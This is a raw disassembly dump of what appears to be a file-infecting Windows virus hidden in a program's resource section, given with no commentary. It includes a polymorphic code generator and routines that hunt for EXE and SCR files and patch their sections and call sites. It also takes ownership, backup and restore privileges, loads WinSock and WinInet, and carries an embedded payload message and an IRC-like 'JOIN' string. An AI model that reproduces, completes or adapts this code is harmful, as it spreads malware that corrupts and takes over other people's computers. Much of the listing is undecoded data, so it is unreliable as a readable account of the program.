xor ecx, ecx
lea eax, [ebp+104324h]
push ecx
push ecx
push ecx
push ecx
push eax
push ecx
push ecx
push ecx
call dword ptr [ebp+103EC2h]
call near ptr loc_43B03D+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_43B03D: ; CODE XREF: .rsrc:0043B02E�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
or al, [eax]
; ---------------------------------------------------------------------------
db 0
dd 70737700h, 746E6972h, 50004166h, 3E6E95FFh, 85890010h
dd 103E76h, 8D8D310Fh, 101985h, 3F7C8589h, 0FF510010h
dd 103EC695h, 4689300h, 8D000000h, 101992B5h, 0BD8D5900h
dd 103F62h, 0FFF5C2E8h, 85C766FFh, 101E75h, 0A5835000h
dd 101E77h, 35958D00h, 5000101Eh, 6A016A54h, 2685200h
dd 0FF800000h, 103F6695h, 5AC08500h, 8D8D2275h, 101E68h
dd 8D066A52h, 101E75B5h, 50565400h, 0FF525150h, 103F6A95h
dd 95FF5800h, 103F62h, 418385C6h, 0E8000010h, 0Ch, 434F5357h
dd 2E32334Bh, 4C4C44h, 3EC695FFh, 68930010h, 7, 18E9B58Dh
dd 8D590010h, 103F32BDh, 0F53DE800h, 0CE8FFFFh, 57000000h
dd 4E494E49h, 442E5445h, 0FF004C4Ch, 103EC695h, 0FC08500h
dd 23584h, 5689300h, 8D000000h, 101927B5h, 0BD8D5900h
dd 103F4Eh, 0FFF506E8h, 52BD83FFh, 103Fh, 210840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 103F32h, 190C481h, 8B500000h
dd 52006AD4h, 3F5295FFh, 0C0850010h, 680D7559h, 1388h
dd 3EE695FFh, 0E2EB0010h, 1E77BD83h, 75000010h, 7B858D29h
dd 5000101Eh, 3F3E95FFh, 0C0850010h, 189840Fh, 408B0000h
dd 0FF008B0Ch, 77858F30h, 0C600101Eh, 10418385h, 6A0100h
dd 26A016Ah, 3F4A95FFh, 0F8830010h, 60840FFFh, 93000001h
dd 1E73958Dh, 106A0010h, 95FF5352h, 103F3Ah, 850FC085h
dd 140h, 1E94BD8Dh, 8B10010h, 0FFFA3CE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 0BE95FF54h, 8D00103Eh, 101EA2BDh, 0E801B100h
dd 0FFFFFA1Dh, 1E8F958Dh, 6A0010h, 1468h, 0FF535200h, 103F4695h
dd 24448D00h, 24958D14h, 50001043h, 8B0AB60Fh, 0C1142444h
dd 4A0208E0h, 24A1201h, 0B034A12h, 80082444h, 0E0C10FE1h
dd 440B5108h, 32FF1024h, 84BD8D50h, 0E800103Fh, 1Ch, 78362E25h
dd 2E202E20h, 25253A20h, 78382E25h, 25207825h, 4F4A0A73h
dd 204E49h, 7695FF57h, 8100103Eh, 0ACC4h, 50006A00h, 95FF5357h
dd 103F46h, 15988D8Bh, 6A0010h, 0C96B1BE3h, 5E8510Dh, 26000000h
dd 0A6425h, 7695FF57h, 8300103Eh, 0EB500CC4h, 7680Bh, 0BD8D0000h
dd 101EA8h, 95FF5357h, 103F46h, 547EC085h, 3F84B58Dh, 0A5830010h
dd 101598h, 838D8D00h, 2B001041h, 51006ACEh, 95FF5356h
dd 103F42h, 7E00F883h, 0FE8B912Fh, 3F84B58Dh, 0DB00010h
dd 1075AEF2h, 0FA2AE860h, 7261FFFFh, 8D09E317h, 0EAEB0177h
dd 0CE2BCF8Bh, 3F84BD8Dh, 0A4F30010h, 0B9EBF787h, 3695FF53h
dd 8000103Fh, 10157FBDh, 2A740100h, 753068h, 0E695FF00h
dd 8000103Eh, 104183BDh, 11740000h, 1E7785C7h, 10h, 85C60000h
dd 104183h, 0FE08E900h, 85C7FFFFh, 101588h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 0A8216574h, 294CA2A1h
dd 1310A614h, 0CA10A614h, 8F7F95D1h, 0E5C76898h, 0BD27B1FAh
dd 38D82Dh, 18h dup(0)
dd 60000000h, 42F4A583h, 83000010h, 1042F8A5h, 0B70F0000h
; CODE XREF: .rsrc:0043C053�p
; .rsrc:0043C090�p ...
dd 538D1443h, 4BB70F18h, 8BD00306h, 2B242444h, 19720C42h
dd 7308423Bh, 14428B14h, 890C422Bh, 1042F495h, 0F8858900h
dd 0EB001042h, 28C28305h, 0C261D9E2h, 85880004h, 102467h
dd 64E8h, 206800h, 858D0000h, 102394h, 74183959h, 4C0830Ch
dd 85FFF7E2h, 1042D0h, 3D9F7C3h, 1024678Dh, 0FF10E300h
dd 8FFC70h, 0E204E883h, 949D89F6h, 83001023h, 574003Ah
dd 7203322Bh, 0FC4E8D10h, 835E5B58h, 474003Ah, 3EB32FFh
dd 0E81072FFh, 0FFFFFF57h, 8D2BCE2Bh, 1042F8h, 344B0358h
dd 0D4858FC3h, 0C7001042h, 1042D085h, 0
dd 3CE800h, 858B0000h, 1042D0h, 0FFF6A9E8h, 18E8FFh, 0BD830000h
dd 1042D0h, 89087500h, 1024109Dh, 0FF9CEB00h, 1042D08Dh
dd 858FC300h, 1042D4h, 42D09589h, 3E80010h, 33000000h
dd 938BC3C9h, 80h, 0FEEDE852h, 9503FFFFh, 1042F8h, 7A83D603h
dd 840F000Ch, 107h, 107A83h, 0FD840Fh, 428B0000h, 0C8E8500Ch
dd 3FFFFFEh, 1042F885h, 50C60300h, 0F980088Ah, 80197400h
dd 3742EF9h, 8BF1EB40h, 0E1810148h, 0DFDFDFDFh, 4C44F981h
dd 0EC75004Ch, 83C82B59h, 8F0FFAF9h, 0B7h, 0FE788166h
dd 850F3233h, 0ABh, 3A8356h, 4A8B0575h, 8B02EB10h, 51F1030Ah
dd 0FFFE72E8h, 0F8B503FFh, 0AD001042h, 0FB78C085h, 84840Fh
dd 0B5FF0000h, 1042F8h, 0FE55E850h, 8503FFFFh, 1042F8h
dd 42F8858Fh, 4030010h, 0C0835324h, 0FDB3302h, 12E308B6h
dd 5320C980h, 42424C1h, 29241C29h, 405B240Ch, 0FB81E9EBh
dd 0DDBBD70Fh, 0FB813E74h, 0DB6E45A8h, 0FB813674h, 0FFA13B59h
dd 0FB812E74h, 0ACB522D6h, 0FB812674h, 0F358E993h, 0FB811E74h
dd 0F358E97Dh, 0FB811674h, 0E1253F46h, 0FB810E74h, 0E1253F30h
dd 95FF0674h, 1042D4h, 0FF71E95Bh, 835EFFFFh, 0EFE914C2h
dd 0C3FFFFFEh, 58046A03h, 0FFF549E8h, 419588FFh, 66001026h
dd 21831B8h, 3E4C0E2h, 0AB66E202h, 0E858066Ah, 0FFFFF52Eh
dd 8708C283h, 58056AD1h, 0FFF521E8h, 3FA80FFh, 50B00B73h
dd 26418502h, 0EBAA0010h, 58686A27h, 3FA80AAh, 11B01875h
dd 0FFF501E8h, 1B8FFh, 0D2840000h, 0E0D10D74h, 0F6EBCAFEh
dd 0B805EBh, 0AB800000h, 8DC3BFE2h, 1039CC95h, 0F7D72B00h
dd 85F7C3DAh, 1039C0h, 10000000h, 0C1C0950Fh, 85F60BE0h
dd 1039BEh, 66067501h, 0EB25890Dh, 0BE85F613h, 2001039h
dd 0D660675h, 4EB2531h, 25010D66h, 0BCE8AB66h, 8BFFFFFFh
dd 95893443h, 1042E8h, 85F7C3ABh, 1039C0h, 10000000h, 4C0950Fh
dd 9CE8AABCh, 89FFFFFFh, 1042EC95h, 0BE85F600h, 1001039h
dd 310F0475h, 0C02B02EBh, 85F7C3ABh, 1039C0h, 10000000h
dd 858A2774h, 1039BAh, 660BE0C1h, 66458B0Dh, 0AAF8B0ABh
dd 39BA858Ah, 0E0C10010h, 6467051Bh, 33AB0689h, 0EBAB66C0h
dd 8F64B812h, 8AAB0005h, 1039BA85h, 0C1580400h, 0C3AB18E0h
dd 279C85C6h, 0EB090010h, 0EBFCB025h, 0EBB86620h, 0EBAB6600h
dd 58046A19h, 0FFF409E8h, 0D2048DFFh, 6608E0C1h, 66C08905h
dd 0B003EBABh, 0F6AAA90h, 0F3F0E858h, 8580FFFFh, 10279Ch
dd 8FA8006h, 0D2842F73h, 2 dup(0CAFEC374h), 0CAFEC774h
dd 0CAFED974h, 0CAFE0C74h, 0CAFE0F74h, 0F9B00F74h, 87B0CBEBh
dd 0EBDBB0AAh, 0EBF5B0C4h, 0EBF8B0C0h, 85F7C3BCh, 1039C0h
dd 2000h, 27586B0h, 4F8D0404h, 0B8A58AFEh, 66001039h, 5FC80ABh
dd 0B00775h, 40FF4F80h, 0FF62E8AAh, 85F7FFFFh, 1039C0h
dd 4000h, 3166B866h, 29B40275h, 18B0AB66h, 39BA850Ah, 0E0C00010h
dd 3DE8AA03h, 0B0FFFFFFh, 0C085F788h, 1039h, 75000080h
dd 8A86B002h, 1039B8A5h, 80AB6600h, 77505FCh, 4F8000B0h
dd 0C3AA40FFh, 39CCBD8Dh, 0DE80010h, 0F7FFFFFFh, 1039C085h
dd 40000000h, 0B0037400h, 85F7AA60h, 1039C0h, 10000000h
db 74h, 7, 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
dd 0F020000h, 0F084h, 0AAE8B000h, 0D8BD89ABh, 0E8001042h
dd 0FFFFFECCh, 0ABAAE8B0h, 42DCBD89h, 0BDE80010h, 0F7FFFFFEh
dd 1039C085h, 300h, 0F71A7400h, 1039C085h, 0
dd 0E80A7402h, 0FFFFFE2Eh, 0FFFE9BE8h, 0AAE9B0FFh, 0D8858BABh
dd 8B001042h, 89C82BCFh, 1042E0BDh, 0FC488900h, 0FF6467B8h
dd 0C033AB36h, 85F7AB66h, 1039C0h, 3, 85F61374h, 1039BEh
dd 0E80A7480h, 0FFFFFDAAh, 0FFFE5BE8h, 6467B8FFh, 33AB2689h
dd 0F7AB66C0h, 1039C085h, 300h, 0F65A7400h, 1039BE85h
dd 0A758000h, 0FFFD81E8h, 0FE32E8FFh, 2E8FFFFh, 0B0FFFFFDh
dd 0FB14E820h, 39E3FFFFh, 15FFB866h, 0AB91AB66h, 39C0958Bh
dd 0D2F70010h, 3C2F7h, 14750000h, 0FFFCDCE8h, 0E81FB0FFh
dd 0FFFFFAEEh, 15FFB866h, 0AB91AB66h, 858BCF8Bh, 1042E0h
dd 4889C82Bh, 0C085F7FCh, 3001039h, 74000000h, 0C085F738h
dd 1039h, 740C0000h, 0C085F72Ch, 1039h, 75020000h, 0FDC2E80Ah
dd 4BE8FFFFh, 0F7FFFFFDh, 1039C085h, 0
dd 0E80A7408h, 0FFFFFDACh, 0FFFD61E8h, 0C085F7FFh, 4001039h
dd 74000000h, 0FD96E817h, 29B8FFFFh, 0ABC8FEC0h, 74C008B8h
dd 75B8AB04h, 0AB67EBF8h, 0FFFD7FE8h, 0C085F7FFh, 8001039h
dd 75000000h, 0BEBD8072h, 1039h, 65E86974h, 0B8FFFFFDh
dd 0C9291829h, 39BAA50Ah, 0E4C00010h, 0BAA50A03h, 0AB001039h
dd 0FFFD4BE8h, 0AAB1B0FFh, 39BE858Ah, 0E8AA0010h, 0FFFFFD3Ch
dd 0BA85B60Fh, 8D001039h, 4004C004h, 0B008E0C1h, 0B0AB668Dh
dd 0E857AA01h, 0FFFFFD20h, 66243C29h, 59FBE2B8h, 39C085F7h
dd 100010h, 7740000h, 66AA49B0h, 2FA75B8h, 0E8AB66E1h
dd 0FFFFFCFCh, 33AAE8B0h, 0BD89ABC0h, 1042C4h, 39C085F7h
dd 200010h, 3B750000h, 0FCDEE857h, 85F7FFFFh, 1039C0h
dd 80000000h, 0BD891874h, 1042F0h, 0FFFD39E8h, 0FCC2E8FFh
dd 0C3B0FFFFh, 0FCBAE8AAh, 8B5AFFFFh, 2B58B0CFh, 0B8850ACAh
dd 89001039h, 0E8AAFC4Ah, 0FFFFFCA4h, 0C081B866h, 39C085F7h
dd 400010h, 3740000h, 0A28C480h, 1039B8A5h, 89AB6600h
dd 1042C8BDh, 85F7AB00h, 1039C0h, 40000000h, 50B00975h
dd 39B88502h, 0F7AA0010h, 1039C085h, 8000h, 0B00B7500h
dd 0B9850AB8h, 0AA001039h, 0B8663DEBh, 85F71831h, 1039C0h
dd 100h, 29B00274h, 39B9A50Ah, 0E4C00010h, 0B9A50A03h
dd 66001039h, 81B866ABh, 0C085F7F0h, 1039h, 75000002h
dd 0AC8B402h, 1039B9A5h, 89AB6600h, 1042E4BDh, 29CCB800h
dd 0F7AB0000h, 1039C085h, 800h, 0E8717400h, 0FFFFFBFCh
dd 39C085F7h, 4000010h, 0B750000h, 850AB8B0h, 1039BAh
dd 0F74DEBAAh, 1039C085h, 80000h, 66117500h, 0AE083B8h
dd 1039BAA5h, 33AB6600h, 15EBAAC0h, 1829B866h, 39BAA50Ah
dd 0E4C00010h, 0BAA50A03h, 66001039h, 0C085F7ABh, 1039h
dd 66000010h, 74C081B8h, 8C48003h, 39BAA50Ah, 0AB660010h
dd 0BE85B60Fh, 0AB001039h, 0FFFB8BE8h, 0C085F7FFh, 1039h
dd 74400000h, 250B00Eh, 1039B885h, 71E8AA00h, 8DFFFFFBh
dd 8D89FE4Fh, 1042CCh, 39C085F7h, 10h, 17748000h, 8BAAE8B0h
dd 1042F085h, 83C72B00h, 89AB04E8h, 1042F0BDh, 0E805EB00h
dd 0FFFFFBB2h, 0FFFB3BE8h, 0C085F7FFh, 1039h, 75000100h
dd 0A40B00Bh, 1039B885h, 0FEBAA00h, 0C083B866h, 39B8A50Ah
dd 0AB660010h, 0F7AA01B0h, 1039C085h, 2000000h, 0F72F7500h
dd 1039C085h, 4000000h, 0B01A7500h, 0BA850AC0h, 8A001039h
dd 1039BFA5h, 10E0C100h, 8166B866h, 0EB00B0ABh, 0A40B008h
dd 1039BA85h, 85F7AA00h, 1039C0h, 80000h, 0B8661075h, 0A50AE883h
dd 1039B9h, 1B0AB66h, 48B008EBh, 39B9850Ah, 0E8AA0010h
dd 0FFFFFAB0h, 39C085F7h, 10h, 75B10010h, 0B8662575h, 0A50AF883h
dd 1039B9h, 0C033AB66h, 0CCBD29AAh, 0F7001042h, 1039C085h
dd 20000000h, 0B11F7500h, 661BEB77h, 0A1809B8h, 1039B9A5h
dd 3E4C000h, 39B9A50Ah, 0AB660010h, 42CCBD29h, 0C18A0010h
dd 42CCA58Ah, 0AB660010h, 850258B0h, 1039B8h, 0FA4AE8AAh
dd 85F7FFFFh, 1039C0h, 2000003h, 85F72C74h, 1039C0h, 8000000h
dd 85F72075h, 1039C0h, 6000000h, 0AFE80A75h, 0E8FFFFF9h
dd 0FFFFFA1Ch, 0FFF9D1E8h, 0FA12E8FFh, 85F7FFFFh, 1039C0h
dd 10000000h, 0C9B00874h, 0F9FEE8AAh, 85F7FFFFh, 1039C0h
dd 400000h, 7B02A74h, 39B8852Ah, 0E0C10010h, 8890D1Ah
dd 0A5020024h, 1039B8h, 8003E4C0h, 0E8AB04C4h, 0FFFFF9D0h
dd 0E8AA61B0h, 0FFFFF9C8h, 0E0FFB866h, 39B8A50Ah, 0AB660010h
dd 0FFF9B7E8h, 0C085F7FFh, 20001039h, 74000000h, 0C085F76Fh
dd 1039h, 74800000h, 8BC78B1Fh, 1042F08Dh, 89C12B00h, 0FFE8FC41h
dd 0E8FFFFF9h, 0FFFFF988h, 0E8AAC3B0h, 0FFFFF980h, 8D8BC78Bh
dd 1042C4h, 4189C12Bh, 0A58B0FCh, 1039B885h, 65E8AA00h
dd 0F7FFFFF9h, 1039C085h, 80000000h, 660C7400h, 0AC350B8h
dd 1039B885h, 660AEB00h, 0AE0FFB8h, 1039B8A5h, 0E8AB6600h
dd 0FFFFF93Ch, 39C085F7h, 30010h, 5F740200h, 858BCF8Bh
dd 1042DCh, 4889C82Bh, 0F7C933FCh, 1039C085h, 0
dd 8D0E7501h, 1039B885h
db 0
; ---------------------------------------------------------------------------
loc_43BF11: ; CODE XREF: .rsrc:0043BF17�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_43BF11
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_43BF2E
mov ax, 0C031h
stosw
loc_43BF2E: ; CODE XREF: .rsrc:0043BF26�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_43BF47
mov ax, 0C031h
stosw
loc_43BF47: ; CODE XREF: .rsrc:0043BF3F�j
mov al, 0C3h
stosb
; ---------------------------------------------------------------------------
dw 0D1E8h
db 0F8h ; ø
db 2 dup(0FFh), 8Dh
db 85h ; …
align 2
dw 1039h
db 0
; ---------------------------------------------------------------------------
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_43BF67
push edi
sub edi, eax
pop eax
jmp short loc_43BF80
; ---------------------------------------------------------------------------
loc_43BF67: ; CODE XREF: .rsrc:0043BF5F�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_43BF80: ; CODE XREF: .rsrc:0043BF65�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_43BFA0
neg eax
loc_43BFA0: ; CODE XREF: .rsrc:0043BF9C�j
stosd
retn 4
; ---------------------------------------------------------------------------
db 56h ; V
db 57h, 83h, 0BDh
db 0
db 43h, 10h, 0
db 0
db 0Fh, 84h, 0D9h
db 1
db 2 dup(0), 0E8h
db 0Dh
align 4
db 4Bh ; K
db 45h, 52h, 4Eh
db 45h ; E
db 4Ch, 33h, 32h
db 2Eh ; .
db 44h, 2 dup(4Ch)
db 0
db 0FFh, 95h, 0AEh
db 3Eh ; >
db 10h, 0, 89h
db 85h ; …
db 14h, 43h, 10h
db 0
db 53h, 8Bh, 58h
db 3Ch ; <
db 3, 0D8h, 0FFh
db 73h ; s
db 28h, 8Bh, 43h
db 34h ; 4
db 0E8h, 0E5h, 0F4h
db 0FFh
db 0FFh, 8Bh, 95h
db 0F4h ; ô
db 42h, 10h, 0
db 5Bh ; [
db 3, 42h, 0Ch
db 89h ; ‰
db 85h, 18h, 43h
db 10h
align 2
dw 4203h
db 8
db 89h, 85h, 1Ch
db 43h ; C
db 10h, 0, 8Bh
db 73h ; s
db 28h, 0FFh, 0B3h
db 80h ; €
align 4
db 0E8h ; è
db 0BEh, 0F4h, 0FFh
db 0FFh
db 8Bh, 0BDh, 0F4h
db 42h ; B
db 10h, 0, 56h
db 0E8h ; è
db 0B2h, 0F4h, 0FFh
db 0FFh
db 8Bh, 95h, 0F4h
db 42h ; B
db 10h, 0, 8Bh
db 4Ah ; J
db 8, 3, 4Ah
db 0Ch
db 2Bh, 0CEh, 83h
db 0E9h ; é
db 5, 0Fh, 88h
db 60h ; `
db 1, 2 dup(0)
db 0Fh
db 84h, 5Ah, 1
db 0
align 2
dw 0B503h
db 0F8h ; ø
db 42h, 10h, 0
db 3
db 0B5h, 0B4h, 42h
db 10h
align 2
; START OF FUNCTION CHUNK FOR sub_43C15D
loc_43C03E: ; CODE XREF: sub_43C15D+29�j
lodsb
cmp al, 0E8h
; END OF FUNCTION CHUNK FOR sub_43C15D
jnz loc_43C0E9
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_43B4C4+3
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_43C06C
cmp eax, [edi+0Ch]
jnb loc_43C185
jmp short loc_43C078
; ---------------------------------------------------------------------------
loc_43C06C: ; CODE XREF: .rsrc:0043C05F�j
cmp [ebp+1042F4h], edx
jnz loc_43C185
loc_43C078: ; CODE XREF: .rsrc:0043C06A�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_43C185
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_43B4C4+3
cmp [ebp+1042F4h], edi
jnz loc_43C185
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_43C185
cmp eax, [edi+8]
jnb loc_43C185
; START OF FUNCTION CHUNK FOR sub_43C15D
loc_43C0C1: ; CODE XREF: sub_43C15D+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_43C19B
jmp loc_43C185
; END OF FUNCTION CHUNK FOR sub_43C15D
; ---------------------------------------------------------------------------
loc_43C0E9: ; CODE XREF: .rsrc:0043C041�j
cmp al, 0FFh
jnz loc_43C185
cmp byte ptr [esi], 15h
jnz loc_43C185
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_43B4C4+3
cmp [ebp+1042F4h], edi
jnz short loc_43C185
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_43C132
cmp eax, [ebp+10431Ch]
jb short loc_43C19B
loc_43C132: ; CODE XREF: .rsrc:0043C128�j
cmp eax, 70000000h
jb short loc_43C170
call sub_43C15D
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_43C15C
add esp, 10h
push dword ptr [ecx]
pop dword ptr [esp+1Ch]
popa
jmp short loc_43C177
; ---------------------------------------------------------------------------
locret_43C15C: ; CODE XREF: .rsrc:0043C14E�j
retn
; =============== S U B R O U T I N E =======================================
sub_43C15D proc near ; CODE XREF: .rsrc:0043C139�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C03E SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0043C0C1 SIZE 00000028 BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_43B58C+42h
popa
loc_43C170: ; CODE XREF: .rsrc:0043C137�j
test eax, 80000000h
jnz short loc_43C185
loc_43C177: ; CODE XREF: .rsrc:0043C15A�j
sub eax, [edi+0Ch]
jb short loc_43C185
cmp eax, [edi+8]
jb loc_43C0C1
loc_43C185: ; CODE XREF: .rsrc:0043C064�j
; .rsrc:0043C072�j ...
dec ecx
jnz loc_43C03E
mov edi, [esp+4+var_4]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_43C1DD
; ---------------------------------------------------------------------------
loc_43C19B: ; CODE XREF: sub_43C15D-7F�j
; .rsrc:0043C130�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_43C1DD: ; CODE XREF: sub_43C15D+3C�j
pop edi
pop esi
retn
sub_43C15D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 57h ; W
db 0FFh, 95h, 0BAh
db 3Eh ; >
db 10h, 0, 0C1h
db 0E8h ; è
db 1Fh, 0Fh, 85h
db 1Ah
db 1, 2 dup(0)
db 50h ; P
db 54h, 6Ah, 28h
db 6Ah ; j
db 2 dup(0FFh), 95h
db 1Ah
db 3Fh, 10h, 0
db 85h ; …
db 0C0h, 5Fh, 0Fh
db 88h ; ˆ
db 5, 1, 0
db 0
db 0E8h, 58h, 0E4h
db 0FFh
db 0FFh, 0E8h, 11h
db 0
db 2 dup(0), 53h
aEtfilesecurity db 'etFileSecurityA',0
db 0FFh
db 0B5h, 88h, 42h
db 10h
align 2
dw 95FFh
db 6Eh ; n
db 3Eh, 10h, 0
db 89h ; ‰
db 85h, 90h, 42h
db 10h
align 2
dw 19E8h
db 0
db 2 dup(0), 53h
aEtakeownership db 'eTakeOwnershipPrivilege',0
db 57h ; W
db 0E8h, 29h, 0E8h
db 0FFh
db 0FFh, 0E8h, 13h
db 0
db 2 dup(0), 53h
aErestoreprivil db 'eRestorePrivilege',0
dw 0E857h
db 0Bh
db 0E8h, 2 dup(0FFh)
db 0E8h ; è
db 12h, 2 dup(0)
db 0
aSebackupprivil db 'SeBackupPrivilege',0
db 57h
dd 0FFE7EEE8h, 18E8FFh, 65530000h, 6E616843h, 6F4E6567h
dd 79666974h, 76697250h, 67656C69h, 0E8570065h, 0FFFFE7CBh
dd 858D5450h, 103DCCh, 6A50646Ah, 95FF5701h, 103F26h, 0FF243C89h
dd 103E6295h, 8DC02A00h, 104184BDh, 50505000h, 3DCCB5FFh
dd 1680010h, 54000400h, 0FF57016Ah, 10429095h, 46A5400h
dd 9095FF57h, 83001042h, 0B5FF14C4h, 104288h, 3E9E95FFh
dd 0C35F0010h, 4184B58Dh, 0FF560010h, 103EA295h, 0FFF88300h
dd 0BB840Fh, 85890000h, 104294h, 0FF56006Ah, 103EDE95h
dd 0FC08500h, 0A484h, 50C02B00h, 50036A50h, 68016Ah, 56C00000h
dd 3E7E95FFh, 0F8830010h, 7840FFFh, 89000006h, 10429885h
dd 9C8D8D00h, 8D001042h, 1042A495h, 6A525100h, 95FF5000h
dd 103EAAh, 0FFFF883h, 5D584h, 0FF006A00h, 104298B5h, 0A695FF00h
dd 8300103Eh, 840FFFF8h, 5BEh, 42AC8589h, 0C9330010h, 5051C303h
dd 51046A51h, 4298B5FFh, 95FF0010h, 103E82h, 840FC085h
dd 59Ah, 8589C933h, 1042B0h, 68515151h, 0F001Fh, 0CA95FF50h
dd 8500103Eh, 53840FC0h, 89000005h, 1042B485h, 27B8C300h
dd 8B000073h, 85F7384Bh, 1039C0h, 20000000h, 85030675h
dd 101069h, 0C103D233h, 0E1F7F1F7h, 42C08589h, 0CBB80010h
dd 8B000029h, 85033C4Bh, 101069h, 0C103D233h, 0E1F7F1F7h
dd 42B88589h, 0FC30010h, 0F9064BB7h, 538D35E3h, 43B70F18h
dd 49D00314h, 328C16Bh, 5F3A81D0h, 0F96E6977h, 7A831D74h
dd 0E072010Ch, 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh
dd 0AC853BC1h, 0C3001042h, 1024548Bh, 828FC033h, 0B8h
dd 0EBCF8BC3h, 84BD8D0Bh, 0FC001041h, 0C933DF8Bh, 72613CACh
dd 777A3C06h, 0AA202C02h, 0EC745C3Ch, 0DD742E3Ch, 0E875003Ch
dd 18BC9E3h, 4558453Dh, 3D0B7400h, 524353h, 0FF33850Fh
dd 38BFFFFh, 4E49573Dh, 26840F43h, 3DFFFFFFh, 4E554357h
dd 0FF1B840Fh, 573DFFFFh, 0F323343h, 0FFFF1084h, 53503DFFh
dd 840F4F54h, 0FFFFFF05h, 2DE8DB33h, 75FFFFFEh, 0FCFAE810h
dd 21E8FFFFh, 0FFFFFFEh, 0FFFEEC84h, 0E8D233FFh, 16h, 0FFFF63E8h
dd 0E8FFh, 815D0000h, 10344FEDh, 3FAE900h, 0FF640000h
dd 0B4B58B32h, 64001042h, 81662289h, 0F5A4D3Eh, 3E385h
dd 3C5E8B00h, 8166DE03h, 0F45503Bh, 3D385h, 1643F700h
dd 2000h, 3C6850Fh, 43F60000h, 840F025Ch, 3BCh, 3D08438Bh
dd 0A0A0A0A0h, 3AE840Fh, 203D0000h, 0F202020h, 3A384h
dd 0C88B8B00h, 0E3000000h, 54E85116h, 3FFFFEFh, 1042F88Dh
dd 83CE0300h, 83004061h, 0E8004461h, 0FFFFFE9Bh, 37A820Fh
dd 0A5830000h, 1042FCh, 8428B00h, 2B104A8Bh, 330473C1h
dd 305EBC0h, 104A89C8h, 42BC8589h, 4A030010h, 0B80Ch, 0E8510001h
dd 0FFFFE68Ah, 39BE9530h, 20B10010h, 39BFB530h, 206A0010h
dd 7858C9FEh, 0E670E814h, 0D285FFFFh, 0D3C2940Fh, 0C09531E2h
dd 0EB001039h, 0C085F7E5h, 1039h, 74020000h, 0C085F722h
dd 3001039h, 75000000h, 0C0A5810Ch, 0FF001039h, 0EBF7FFFFh
dd 0C08D810Ah, 1039h, 68100000h, 6, 66859h, 0E8580000h
dd 0FFFFE622h, 39B8858Ah, 84860010h, 1039B82Ah, 0B8858800h
dd 0E2001039h, 0C085F7E0h, 8001039h, 75000000h, 0BABD8009h
dd 1001039h, 85F7C574h, 1039C0h, 10000000h, 0BD801B74h
dd 1039B8h, 80B07405h, 1039B9BDh, 0A7740500h, 39BABD80h
dd 74050010h, 0C085F79Eh, 1039h, 74004000h, 0B8BD8009h
dd 2001039h, 0A5838977h, 104300h, 0F272E800h, 43E8FFFFh
dd 0E8FFFFFDh, 271h, 42B89D8Bh, 9D030010h, 1042BCh, 0FFFC5BE8h
dd 51840FFFh, 8B000002h, 1042B4B5h, 3C5E8B00h, 5CE8DE03h
dd 0FFFFFFDh, 23B82h, 244A8100h, 0E0000060h, 5652FE8Bh
